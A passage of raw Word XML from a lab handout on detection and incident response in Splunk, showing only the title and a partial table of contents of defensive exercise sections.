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7C7FAE75" w:rsidP="5DE697EB" w:rsidRDefault="7C7FAE75" w14:paraId="5F13BF57" w14:textId="3C40663D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="5DE697EB" w:rsidR="7C7FAE75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab S08B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7C7FAE75" w:rsidP="5DE697EB" w:rsidRDefault="7C7FAE75" w14:paraId="207F95E6" w14:textId="6908902F">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="5DE697EB" w:rsidR="7C7FAE75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6" w:themeShade="FF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detection and Incident Response in Splunk Part B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00637646" w:rsidP="00637646" w:rsidRDefault="06482D2A" w14:paraId="5E1F21FD" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="06482D2A">
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:id w:val="1799762600"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="7288B415" w14:paraId="560C29FD" w14:textId="01B4D283">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00600D56">
            <w:instrText>TOC \o "1-2" \z \u \h</w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:history="1" w:anchor="_Toc193890116">
            <w:r w:rsidRPr="00067CBF" w:rsidR="00ED5445">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Prerequisites</w:t>
            </w:r>
            <w:r w:rsidR="00ED5445">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00ED5445">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00ED5445">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890116 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00ED5445">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00ED5445">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00ED5445">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00ED5445">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="2BB3BBEF" w14:textId="69469FAE">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890117">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Required Resources</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890117 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="293D7E51" w14:textId="02ADEA8A">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890118">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Introduction</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890118 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="3723AFA2" w14:textId="49F69C96">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890119">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1. Lab Description</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890119 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="6F15BB41" w14:textId="49F20B32">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890120">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Tasks</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890120 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="2FBDB1E9" w14:textId="3D334CD2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890121">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1. Execute ART Test Remotely</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890121 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="1B5F16E2" w14:textId="05DDE66B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890122">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Mapping Output to Commands</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890122 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="29FD8A69" w14:textId="526FD3D3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890123">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3 Detection</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890123 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="7EB39B5C" w14:textId="7798BA26">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890124">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Analysis: Trace/Root Cause</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890124 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="4B5C019F" w14:textId="7E8AAA1D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890125">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890125 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="23B70B80" w14:textId="68000B72">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890126">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.1 Block Identified Malicious Actor IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890126 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="40410611" w14:textId="3D6AC272">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890127">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.2 Identify Configuration Change</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890127 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="1992887B" w14:textId="386F0E84">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890128">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.3 Reverse Execution Changes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890128 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="258A830B" w14:textId="2B41C842">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890129">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.4 Block Executables from the Download Folder</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890129 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="4DD204DA" w14:textId="4573BBEA">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890130">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6 Additional Technical Response</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc193890130 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00ED5445" w:rsidRDefault="00ED5445" w14:paraId="0D110075" w14:textId="44BDBCF8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="7910"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc193890131">
            <w:r w:rsidRPr="00067CBF">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.7 Detection Engineering</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
